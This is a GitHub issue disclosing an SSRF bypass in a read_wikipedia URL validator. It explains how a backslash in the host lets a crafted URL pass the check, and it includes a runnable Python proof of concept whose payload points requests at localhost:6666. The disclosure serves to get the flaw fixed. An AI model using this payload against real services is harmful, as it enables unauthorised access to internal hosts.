Skip to content

SSRF bypass in read_wikipedia #43

@Fushuling

Description

@Fushuling

I know this might not be a security scenario, but just a simple format validation, but I still want to point out that the URL validation in read_wikipedia might be bypassed, leading to an SSRF vulnerability.

The function read_wikipedia now relies on _url2title_and_lang for URL translation.

Image

The specific logic involves retrieving netloc, separating it by a dot, and checking if there are more than three parts. The expected approach is to validate a URL like https://en.wikipedia.org/wiki/Python, and finally return the part before the first dot, concatenating them to form https://{lang}.wikipedia.org/w/api.php.

Image

In practice, an attacker could construct a URL like https://localhost:6666\.wikipedia.org/wiki/python, which meets all the current checks and will pass validation, ultimately returning localhost:6666\.. Concatenating these forms https://localhost:6666\.wikipedia.org/w/api.php. For requests.get, it treats \ as /, thus ultimately requesting https://localhost:6666/.wikipedia.org/w/api.php, resulting in an SSRF attack.

from urllib.parse import urlparse
import requests


def _url2title_and_lang(url: str) -> tuple[str, str]:
    p = urlparse(url)
    print(p)

    netloc = p.netloc.split(".")
    if len(netloc) < 3 or "wikipedia" not in netloc:
        raise RuntimeError(f"{url} is not a valid wikipedia url.")
    lang = netloc[0]

    path = [part for part in p.path.split("/") if part != ""]
    if len(path) != 2 or path[0] != "wiki":
        raise RuntimeError(f"{url} is not a valid wikipedia url.")
    title = path[1]

    return title, lang


url = "https://localhost:6666\.wikipedia.org/wiki/python"
title, lang = _url2title_and_lang(url)
params = {
    "action": "query",
    "prop": "revisions",
    "rvprop": "content",
    "rvslots": "main",
    "rvlimit": 1,
    "titles": title,
    "format": "json",
    "formatversion": "2",
}
headers = {"User-Agent": "hyperquest/1.0"}
api_url = f"https://{lang}.wikipedia.org/w/api.php"
print(api_url)
req = requests.get(api_url, headers=headers, params=params, timeout=30)
Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions